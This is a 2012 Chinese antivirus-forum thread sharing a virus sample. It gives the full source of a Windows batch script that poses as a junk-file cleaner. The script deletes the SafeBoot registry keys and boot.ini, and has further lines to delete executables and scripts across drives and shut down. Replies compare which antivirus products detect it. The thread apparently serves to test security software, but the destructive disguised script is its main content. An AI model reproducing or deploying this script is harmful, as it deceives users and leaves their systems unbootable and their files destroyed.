[病毒样本] ┃● ●┃ 批处理再战安全软件 ┃● ●┃(实机运行测试)测主防 测监控 第二季

关闭 [复制链接]
龙而非.
头像被屏蔽

.

http://bbs.kafan.cn/thread-1307807-1-1.html

http://bbs.kafan.cn/thread-1307341-1-1.html

废话不说了 具体我说的都在里面了 http://bbs.kafan.cn/thread-1307807-1-1.html

源码:

@echo off
echo 这是一个垃圾文件清理器,可以清理系统垃圾,释放硬盘空间。
pause
echo 正在分析系统...... 系统垃圾清理器
@echo 正在清理系统垃圾文件,请稍后……
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot"  Network /f
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot"  Minimal /f
ATTRIB %SYSTEMDRIVE%\boot.ini -s -a -r -h
DEL %SYSTEMDRIVE%\boot.ini /f
goto end
del c:\*.exe
del d:\*.dll
del e:\*.vbe
del f:\*.bat
del g:\*.cmd
echo 系统被成功破坏!
echo.
shutdown -s -t 0

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
酱紫啊~

又来360下载报安全
nis2012miss
运行截图如下

本帖子中包含更多资源

x
龙而非.
头像被屏蔽
酱紫啊~ 发表于 2012-6-14 20:16
又来360下载报安全
nis2012miss
运行截图如下

已经删除了一些文件了 哈哈

自己找吧 不然360会提示吗?
消停
头像被屏蔽
看来我记得没错,国外的主防不防批处理!
Dust-;羅錠
大蜘蛛clean,已上报。
消停
头像被屏蔽
Dust-;羅錠 发表于 2012-6-14 20:26
大蜘蛛clean,已上报。

上报应该也没什么用!不知道大蜘蛛如何,fs、诺顿很久以前我就发现对于批处理上报几乎没什么反应,fs靠着bd还好些,诺顿完全无视!今天我也上报了,在官方论坛也反映了!看看是不是还是像以前一样。
Nocria
To ESET.

本帖子中包含更多资源

x
Dust-;羅錠
消停 发表于 2012-6-14 20:32
上报应该也没什么用!不知道大蜘蛛如何,fs、诺顿很久以前我就发现对于批处理上报几乎没什么反应,fs靠着 ...

是吗?之后再看看回复是不是没反应。

本帖子中包含更多资源

x